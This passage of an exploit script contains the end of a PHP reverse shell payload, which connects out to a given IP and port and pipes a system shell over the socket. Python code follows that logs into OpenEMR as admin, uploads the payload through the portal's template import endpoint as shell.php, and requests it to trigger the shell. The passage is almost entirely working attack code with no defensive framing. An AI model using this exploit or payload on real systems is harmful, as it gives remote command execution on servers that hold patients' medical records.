// // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } // Spawn shell process $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) 
printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> """} print (auth) url = "http://localhost/openemr/interface/main/main_screen.php?auth=login&site=default" data= { 'new_login_session_management' : '1', 'authProvider' : 'Default', 'authUser' : 'admin', # change this to the the appropriate username 'clearPass' : 'password123', # change this to the appropriate password 'languageChoice' : '1', } response = s.post(url, data=data,).text time.sleep(2) print (upload) time.sleep(2) resp = s.post("http://localhost/openemr/portal/import_template.php?site=default", data = payload) time.sleep(2) print (netcat) rev_shell = s.get("http://localhost/openemr/portal/shell.php") print (rev_shell.text)